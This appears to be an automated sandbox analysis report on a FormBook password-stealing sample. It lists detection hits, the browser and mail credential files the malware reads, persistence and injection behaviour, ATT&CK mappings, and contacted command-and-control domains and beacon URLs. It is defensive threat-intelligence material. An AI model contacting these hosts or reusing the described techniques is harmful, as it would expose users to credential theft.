          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeQueries volume information: C:\Users\user\AppData\Roaming\hkkRsa.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          Scheduled Task/Job          		612
          Process Injection          		11
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Scheduled Task/Job          		Boot or Logon Initialization Scripts1
          Scheduled Task/Job          		1
          Deobfuscate/Decode Files or Information          		1
          Credential API Hooking          		113
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)4
          Obfuscated Files or Information          		1
          Input Capture          		221
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Credential API Hooking          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Rootkit          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSH1
          Input Capture          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job612
          Process Injection          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Rundll32          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1276619 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 20/07/2023 Architecture: WINDOWS Score: 100 79 Snort IDS alert for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 8 other signatures 2->85 10 hkkRsa.exe 5 2->10         started        13 SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe 7 2->13         started        process3 file4 87 Multi AV Scanner detection for dropped file 10->87 89 Machine Learning detection for dropped file 10->89 91 Tries to detect virtualization through RDTSC time measurements 10->91 93 Injects a PE file into a foreign processes 10->93 16 hkkRsa.exe 10->16         started        19 schtasks.exe 1 10->19         started        55 C:\Users\user\AppData\Roaming\hkkRsa.exe, PE32 13->55 dropped 57 C:\Users\user\...\hkkRsa.exe:Zone.Identifier, ASCII 13->57 dropped 59 C:\Users\user\AppData\Local\...\tmpE41B.tmp, XML 13->59 dropped 61 SecuriteInfo.com.W...11935.10916.exe.log, ASCII 13->61 dropped 95 Uses schtasks.exe or at.exe to add and modify task schedules 13->95 97 Adds a directory exclusion to Windows Defender 13->97 21 powershell.exe 21 13->21         started        23 powershell.exe 21 13->23         started        25 schtasks.exe 1 13->25         started        27 SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe 13->27         started        signatures5 process6 signatures7 71 Modifies the context of a thread in another process (thread injection) 16->71 73 Maps a DLL or memory area into another process 16->73 75 Sample uses process hollowing technique 16->75 77 Queues an APC in another process (thread injection) 16->77 29 explorer.exe 3 1 16->29 injected 33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        39 conhost.exe 25->39         started        process8 dnsIp9 65 www.naspewt.xyz 184.94.215.140, 49729, 49730, 80 VXCHNGE-NC01US United States 29->65 67 vestostore.com 86.38.202.187, 49711, 49712, 49713 LRTC-ASLT Lithuania 29->67 69 14 other IPs or domains 29->69 107 System process connects to network (likely due to code injection or exploit) 29->107 109 Performs DNS queries to domains with low reputation 29->109 41 rundll32.exe 29->41         started        signatures10 process11 file12 51 C:\Users\user\AppData\...\479logrv.ini, data 41->51 dropped 53 C:\Users\user\AppData\...\479logri.ini, data 41->53 dropped 99 Detected FormBook malware 41->99 101 Tries to steal Mail credentials (via file / registry access) 41->101 103 Tries to harvest and steal browser information (history, passwords, etc) 41->103 105 3 other signatures 41->105 45 cmd.exe 41->45         started        signatures13 process14 file15 63 C:\Users\user\AppData\Local\Temp\DB1, SQLite 45->63 dropped 111 Tries to harvest and steal browser information (history, passwords, etc) 45->111 49 conhost.exe 45->49         started        signatures16 process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe24%ReversingLabsWin32.Trojan.Generic
          SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\hkkRsa.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\hkkRsa.exe24%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.comTTF0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/60%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/n-u0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.com60%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/$0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fontbureau.comcoma0%URL Reputationsafe
          http://www.takealicense.comReferer:0%Avira URL Cloudsafe
          http://www.naspewt.xyz0%Avira URL Cloudsafe
          http://www.takealicense.com/co63/www.naspewt.xyz0%Avira URL Cloudsafe
          http://www.vestostore.comReferer:0%Avira URL Cloudsafe
          http://www.pym479.com0%Avira URL Cloudsafe
          http://www.freepad168.com/co63/0%Avira URL Cloudsafe
          http://www.takealicense.com/co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH-0%Avira URL Cloudsafe
          http://www.creativebrea.com/co63/www.mazinhoccb.com0%Avira URL Cloudsafe
          http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/A0%URL Reputationsafe
          http://www.creativebrea.comReferer:0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnu-eN0%Avira URL Cloudsafe
          http://www.ballthingsez.comReferer:0%Avira URL Cloudsafe
          http://www.dulichphucbinh.comReferer:0%Avira URL Cloudsafe
          http://www.creativebrea.com0%Avira URL Cloudsafe
          http://en.w0%URL Reputationsafe
          http://www.saleschildcarriers.com/co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH-0%Avira URL Cloudsafe
          http://www.ballthingsez.com/co63/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/=0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn-0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/$0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
          http://www.fontbureau.comcom60%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnvaB0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/es-ew0%Avira URL Cloudsafe
          http://www.naspewt.xyzReferer:0%Avira URL Cloudsafe
          http://www.creativebrea.com/co63/0%Avira URL Cloudsafe
          http://www.myccsmartmove.com/co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH-0%Avira URL Cloudsafe
          http://www.dulichphucbinh.com0%Avira URL Cloudsafe
          http://www.inf9obase.com/co63/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.myccsmartmove.comReferer:0%Avira URL Cloudsafe
          http://www.f1-austin-tickets.com/co63/www.inf9obase.com0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/H0%URL Reputationsafe
          http://www.ballthingsez.com/co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH-0%Avira URL Cloudsafe
          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
          http://www.f1-austin-tickets.comReferer:0%Avira URL Cloudsafe
          http://www.mazinhoccb.com0%Avira URL Cloudsafe
          http://www.mattewigs.com/co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH-100%Avira URL Cloudmalware
          http://www.mattewigs.com/co63/100%Avira URL Cloudmalware
          http://www.pym479.com/co63/www.creativebrea.com0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.dlafluid.comReferer:0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/=0%URL Reputationsafe
          http://www.fontbureau.comdia0%URL Reputationsafe
          http://www.mazinhoccb.comReferer:0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.vestostore.com/co63/www.saleschildcarriers.com0%Avira URL Cloudsafe
          http://www.cucinainvenice.com0%Avira URL Cloudsafe
          http://www.saleschildcarriers.com/co63/www.ballthingsez.com0%Avira URL Cloudsafe
          http://www.fontbureau.comrsiv0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.saleschildcarriers.com/co63/0%Avira URL Cloudsafe
          http://www.dulichphucbinh.com/co63/www.f1-austin-tickets.com0%Avira URL Cloudsafe
          http://www.inf9obase.com0%Avira URL Cloudsafe
          http://www.freepad168.com0%Avira URL Cloudsafe
          http://www.mattewigs.com/co63/www.dulichphucbinh.com100%Avira URL Cloudmalware
          http://www.myccsmartmove.com/co63/www.takealicense.com0%Avira URL Cloudsafe
          http://www.dlafluid.com0%Avira URL Cloudsafe
          http://www.sajatypeworks.com-0%Avira URL Cloudsafe
          http://www.cucinainvenice.comReferer:0%Avira URL Cloudsafe
          http://www.naspewt.xyz/co63/www.mattewigs.com100%Avira URL Cloudphishing
          http://www.naspewt.xyz/co63/100%Avira URL Cloudphishing
          http://www.vestostore.com0%Avira URL Cloudsafe
          http://www.vestostore.com/co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH-0%Avira URL Cloudsafe
          http://www.saleschildcarriers.com0%Avira URL Cloudsafe
          http://www.pym479.comReferer:0%Avira URL Cloudsafe
          http://www.f1-austin-tickets.com0%Avira URL Cloudsafe
          http://www.takealicense.com0%Avira URL Cloudsafe
          http://www.cucinainvenice.com/co63/0%Avira URL Cloudsafe
          http://www.inf9obase.com/co63/www.cucinainvenice.com0%Avira URL Cloudsafe
          http://www.vestostore.com/co63/0%Avira URL Cloudsafe
          http://www.fontbureau.comalsd~0%Avira URL Cloudsafe
          http://www.dulichphucbinh.com/co63/0%Avira URL Cloudsafe
          www.mattewigs.com/co63/100%Avira URL Cloudmalware
          http://www.fontbureau.comursiv0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dlafluid.com
          		34.102.136.180
          		truefalse
            		unknown
            342284.parkingcrew.net
            		76.223.26.96
            		truefalse
              		high
              www.naspewt.xyz
              		184.94.215.140
              		truetrue
                		unknown
                td-ccm-neg-87-45.wixdns.net
                		34.149.87.45
                		truetrue
                  		unknown
                  www.saleschildcarriers.com
                  		172.67.215.254
                  		truetrue
                    		unknown
                    sni1gl.wpc.lambdacdn.net
                    		152.199.21.175
                    		truetrue
                      		unknown
                      shops.myshopify.com
                      		23.227.38.74
                      		truetrue
                        		unknown
                        vestostore.com
                        		86.38.202.187
                        		truetrue
                          		unknown
                          www.vestostore.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ballthingsez.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.myccsmartmove.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.takealicense.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.mattewigs.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.dlafluid.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.takealicense.com/co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH-true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.saleschildcarriers.com/co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH-true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ballthingsez.com/co63/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.myccsmartmove.com/co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH-true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ballthingsez.com/co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH-true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mattewigs.com/co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH-true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.mattewigs.com/co63/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.saleschildcarriers.com/co63/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.naspewt.xyz/co63/true
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://www.vestostore.com/co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH-true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.vestostore.com/co63/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      www.mattewigs.com/co63/true
                                      • Avira URL Cloud: malware
                                      		low

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.jiyu-kobo.co.jp/es-ewSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.pym479.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
